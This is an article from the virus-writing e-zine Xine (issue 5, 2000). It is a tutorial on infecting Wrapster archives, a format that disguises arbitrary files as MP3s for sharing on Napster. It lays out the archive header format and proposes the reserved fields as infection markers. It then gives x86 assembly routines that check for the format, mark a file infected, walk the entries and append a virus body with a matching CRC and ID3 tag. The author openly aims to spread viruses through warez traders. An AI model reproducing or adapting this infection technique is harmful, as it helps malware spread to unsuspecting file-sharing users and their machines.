Copy Link
Add to Bookmark
Report
Xine - issue #5 - Phile 112
Ú-----------------------------¿
| Xine - issue #5 - Phile 112 |
À-----------------------------Ù
------------------------------------------------------------------------
Wrapster MP3 archieve infection tutorial
------------------------------------------------------------------------
Asmodeus iKX (c) 2000, xine#5
------------
Introducion
------------
Infecting MP3 files is nice... well wrapster mp3 files are not ordinary
mp3s.. well it's not really mp3s at all... It uses the mp3 exstension
and some mp3 structures to make it look like a valid mp3 file. But in
"reality" it's an archieve file that mainly is exchanged over the
napster network. Too use it for anything would be plainly stupid as it
applys no compression at all. In this article I'll teach you how to
drop in an wrapster mp3 archieve but with a little skills and patients
you can also extract/infect/re-add files to the archieves. The only
real cool thing about wrapster archieve infection is that AV people will
have to search for viruses in .MP3 files and that it enables your virus
to be transmitted over the internet/napster network...
Here is what the author of wrapster has to say about it...
<--snip--->
--( What is Wrapster? )--------------------------------------------------------
Wrapster is a state of the art program that will redefine the way you use
Napster and the Internet in general. Napster (http://www.napster.com/) is an
easy to use program that lets you join a community of users that share their
MP3 files worldwide.
Generally, you'd only use Napster for sharing digital audio files, but
that's all about to change; this is where Wrapster comes into play. Wrapster
lets you share ANY files through Napster, disguising them as legitimate MP3
files that are "encoded" at a specific bitrate. This special bitrate allows
you to easily search for any Wrapster files that may be hiding on Napster
servers.
Here is an example of how Wrapster can be used to share ANY files you choose
on the Napster network: Let's say a friend of yours has a copy of Win2K still
zipped up from when (s)he first downloaded it from an IRC server. It's
probably about 44 files in total, each of them being about 5 megs in size.
Your friend simply runs Wrapster and creates a new archive with it. Then (s)he
adds the 40-something or so files to the Wrapster archive and places it in
their shared MP3 folder. You connect to the Napster network and search for
either "Win2K" or the special bitrate that Wrapster uses to "encode" its files
and low and behold it will appear in your search window. All you have to do
now to get your copy of Win2K is download it just like any other legitimate
MP3 file and when it's finally saved to your harddrive, just load up a copy of
Wrapster and extract that operating system goodness.
Bitrate = 32 Kb/s Frequency = 32000 Hz .. these are the search parameters
you should key in if you wish to search for Wrapster files.
Don't be alarmed if you don't find any Wrapster files on Napster at first.
It may take a while for this to catch on. In the meantime just share your
files and encourage others to do the same.
<--snip--->
------------
Structure
------------
The wrapster file looks very much like any other archieve file like
rar, arj etc. At the base of the wrapster file you will find a
"main header" with some mp3 signature and some signature and version
information as well as how many files are stored in the wrapster
archieve. There is also a reserved (unused) slack space in this
part of the header which could be used for an infection marker maybe?
Well after the main header comes the file object header
first file in the wrapter archieve... well I there is no real
such names for it... but to make it a bit easier to grasp I'll
name it and give you a good layout picture of it later. After the
first file object header comes the actual data of the file
and directly after the file data follows the file object header of
the next file. The file object header contains information about
the file such as the CRC32, filename and filesize it also holds
a reserved (unused) slack space :)
Ok lets have a quick look at the layout
Ú-----------------------------------------------¿
| Wrapster main header |
| |
| þ FrameHeader 4 bytes | OFFSET : 00000000d
| þ Reserved (Unused) 6 bytes | OFFSET : 00000004d
| þ Signature 10 bytes | OFFSET : 00000010d
| þ Version 8 bytes | OFFSET : 00000020d
| þ FileCount 4 bytes | OFFSET : 00000028d
Ã-----------------------------------------------´
| File object header |
| |
| þ OriginalFileName 256 bytes | OFFSET : 00000032d
| þ Reserved (Unused) 32 bytes | OFFSET : 00000288d
| þ CRC32 4 bytes | OFFSET : 00000320d
| þ Size 4 bytes | OFFSET : 00000324d
Ã-----------------------------------------------´
| File Data filesize bytes | OFFSET : 00000328d
: :
ú ú
ú ú
Ã-----------------------------------------------´
| File object header |
ú ú
etc..etc..etc
After all file entries in the Wrapster file you will encounter padding
that helps to assure that the files contained within the archive remain
intact. This was done as a precaution since many downloads across
Napster tend to get the last few bytes cut off.
The last 128 bytes of the padding contain an MP3 identification tag that
will show up in the play-list of programs like Winamp as an ID3 tag. You
may put any values in here that you like. See the MP3 specification for
more information
"TAGNot A Winamp File Wrapster File", 83 dup (0)
------------------------------------------------------------------------
Wrapster main header
------------------------------------------------------------------------
þ FrameHeader 4 bytes :
The "id" bytes of an legitimate mp3 file, sort of like the "MZ" bytes
of an exe file.
in hex "0xFF, 0xFB, 0x18, 0x0C"
in ascii "ÿû
" (note the first one is unprintable :) )
þ Reserved (Unused) 6 bytes :
Unused space, that could be used in future versions of wrapster...
or maybe by your virus as an infection marker?
þ Signature 10 bytes :
Wrapster signature followed by two null bytes.
"wrapster",0,0
þ Version 8 bytes :
Version number of wrapster followed by 6 null bytes for future
versions :))
"1.0",0,0,0,0,0
þ FileCount 4 bytes :
Number of files stored in wrapster archieve... this one is very important
as you need it to parse the wrapster file and increase it if you add
another file to the archieve.
------------------------------------------------------------------------
File object header
------------------------------------------------------------------------
þ OriginalFileName 256 bytes :
The filename of the file "relative" to the file object header (the
file the header describes)
þ Reserved (Unused) 32 bytes :
Unused space, that could be used in future versions of wrapster...
or maybe by your virus as an infection marker?
þ CRC32 4 bytes :
Calculated CRC32 of the data of the file (not with header and shit included
, but the pure file data). The polynomial of the crc32 routine is very
wacked and I have no idea of how to obtain it... it doesn't use same
polynomial as zip/rar/arj etc, so the crc32 of those routines isn't valid.
You some how have to get past this.. but in the latest version of wrapster
it skips crc32 check by default, so it's not really a mayor problem but
it's irritating.
þ Size 4 bytes :
Size of the file data "relative" to the file object header (the
file the header describes)
þ File data
Actual file data
þ Padding
a couple of null bytes (3968 bytes or so :))
þ Mp3 tag
The mp3 tag
"TAGNot A Winamp File Wrapster File", 83 dup (0)
------------
Infection
------------
OK, first I'll take the theory and then I'll show you some code... But
the code wouldn't work if you copy/paste it into your virus because
I left out routines that open/map/unmap the files and such, that you
could learn from some other tutorial... But if you are a bit smart
then you'll know how to infect the wrapster archieve from reading the
theoritical part and maybe peeking some at the code to get some ideas..
------------
Theory
------------
First you should scan maybe the current directory for .MP3 files or if
you access the filenames some other way like perprocess or kernel32.dll
residency, doesn't really matter. When you found the file open it and
map it in memory (well that is the method I prefer). Then check if it's
a valid mp3 file and if it's a wrapster archieve. This can be done
by checking the first 4 bytes and then the signature bytes at
offset base+10d, you should also check for previous infection with the
mark you done on infected files. Maybe the unused bytes at offset base+4d..
Ok if it's not infected then get the number of files stored in the
wrapster file (base+28d) then get the filesize of the first file...
adding main header size and the the file object header size to the
file size of the data and you got the physical location of the next
file object header...decrease the number of file entries and check if
you hit zero count, if not keep adding file object header size and file
size until you reach the end. Then you add another file object header
describing the file you're about to add. But you could wait with this
and prepare the header before adding it.. it must contain the filename/
filesize/crc32 of the file you're going to drop. Now you should
open/map the file you want to drop into the wrapster archieve and calculate
the crc32 of that file and save the size and drop the file object header...
If you did as I said first, drop the header before calculating the values
you must update the droped header with the new values... well after the
header you write the actual data of the file and after that the padding
bytes and the mp3 tag. Notice that when you map the file, add a couple
of "slack-space" plus the size of padding/file to add/tag/headers etc
if you "allocate" less than needed you will write beyond the memory boundary
and into read-only memory which will cause some serious errors.
------------
Practice
------------
;Some equotes, use the layout if you want to know the location of other
;values... Btw I recommend analyzing an wrapster mp3 archieve with a hex
;editor or softice (mapped and such) to see how it looks like... maybe
;get the grip of how the padding and MP3 tag is appended at the end...
wrapster_Reserved equ 4d
wrapster_Signature equ 10d
wrapster_FileCount equ 28d
wrapster_size equ 324d
wrapster_pad equ 3968d
infect_wrapster:
pushad
call open_map_virus
mov dword ptr [ebp+virus_loc],eax
test eax,eax
popad
jne mp3_infected
; Ok basicly, you should open/map the file you want to add to the wrapster
; archieve, when you decide to do this is irrelevant.. but take precaution
; so no important register values are fucked up..
cmp dword ptr [esi+10d], "parw"
jne mp3_infected
; Check if the .MP3 file is a wrapster file, so you won't infect ordinary
; mp3s which would render them next to usless.. if not completely destroy
; them. The main header of the wrapster archieve contains the "wrapster"
; signature if you remember... check layout for more info about checks
; that could be performed.
cmp dword ptr [esi+4d],"CAOR"
je mp3_infected
; Check for previous infection... you could use the reserved slack space
; in after the mp3 signature bytes.
mov edi,esi
add edi,4d
mov eax,"CAOR"
stosd
xor eax,eax
mov al,"H"
stosb
; well basicly mark the file infected :)
add esi, wrapster_FileCount
lodsd
mov dword ptr [ebp+wrap_filecount],eax
inc eax
mov edi,esi
sub edi,4d
stosd
; save the number of files (file count) and increase it if you wanna
; add yet another file to the archieve.
get_last_wrapter_entry:
cmp dword ptr [ebp+wrap_filecount],0
je last_wrapter_entry
dec dword ptr [ebp+wrap_filecount]
add esi,292d
lodsd
add esi,eax
jmp get_last_wrapter_entry
last_wrapter_entry:
; Parse the wrapster object header structures to find the last file entry
; of the wrapster archieve
add_virus_text:
mov dword ptr [ebp+wrap_nh],esi
push esi
mov esi,dword ptr [ebp+virus_loc]
mov ecx,dword ptr [ebp+virus_mem]
call crc_calc
lea edi,[ebp+w_crc32_off]
stosd
xor eax,eax
mov eax,dword ptr [ebp+virus_mem]
stosd
pop esi
mov edi,esi
lea esi,[ebp+wrapster_header]
mov ecx,wrapster_header_len
cld
rep movsb
; Calculate the CRC32 of the file and make sure you have the filesize
; of the file you wanna add.. prepare your custom file header and append
; it behind the last file entry.
; also append the file to drop in the archieve after the header.
mov esi,dword ptr [ebp+virus_loc]
mov ecx,dword ptr [ebp+virus_mem]
cld
rep movsb
xor eax,eax
mov ecx,wrapster_pad
rep stosb
; Append padding bytes
lea esi,[ebp+wrapster_tag]
mov ecx,wrapster_tag_len
cld
rep movsb
; Append the MP3 Tag, to make more exqusite MP3 tags download the rfc about
; ID3 Tags or study ordinary MP3 files with a hexeditor..
pushad
call close_open_virus
popad
; Close up the file you added to the archieve
jmp close_all
; Also close and unmap the wrapster archieve
mp3_infected:
mov ecx,dword ptr [ebp+unchanged_size]
mov dword ptr [ebp+newfilesize],ecx
jmp close_all
------------
Conclusion
------------
Well this is just another archieve among others... the only really advantage
with droppping in wrapster archieves is that it's only internet related, and
we like that right :)) Also it's almost only warez that is traded in wrapster
archieves... well basicly it's only warez to be true :) Warez kiddies are
the best hosts, CIH proved that... Btw if you want info on CRC32 or such
you could mail me or check some other tutorial :)
